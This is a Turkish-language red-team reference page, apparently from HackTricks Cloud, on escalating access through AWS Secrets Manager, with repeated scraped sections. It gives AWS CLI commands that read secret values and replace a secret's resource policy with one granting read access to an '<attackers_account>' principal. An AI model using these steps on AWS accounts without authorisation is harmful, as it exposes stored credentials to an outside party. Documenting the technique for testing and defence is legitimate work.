AWS - Secrets Manager Privesc

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

Secrets Manager

Secrets manager hakkında daha fazla bilgi için kontrol edin:

AWS - Secrets Manager Enum

`secretsmanager:GetSecretValue`

Bu izne sahip bir saldırgan, AWS Secretsmanager içindeki bir sırın kaydedilmiş değerini alabilir.

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Potansiyel Etki: AWS secrets manager hizmetinde yüksek hassasiyete sahip verilere erişim.

`secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)

Önceki izinlerle, başka ilkeler/hesaplar (hatta harici) için gizli verilere erişim sağlamak mümkündür. KMS anahtarı ile şifrelenmiş gizli verileri okumak için kullanıcının ayrıca KMS anahtarına erişimi olması gerektiğini unutmayın (daha fazla bilgi için KMS Enum sayfasına bakın).

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousAWS - Sagemaker Privesc NextAWS - SSM Privesc

Last updated 3 days ago

Secrets Manager

Secrets manager hakkında daha fazla bilgi için kontrol edin:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

Bu izne sahip bir saldırgan, AWS Secretsmanager içindeki bir sırın kaydedilmiş değerini alabilir.

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Potansiyel Etki: AWS secrets manager hizmetinde yüksek hassasiyete sahip verilere erişim.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}

Secrets Manager

secretsmanager:GetSecretValue

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

Secrets Manager

secretsmanager:GetSecretValue

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

`secretsmanager:GetSecretValue`

`secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)

`secretsmanager:GetSecretValue`

`secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)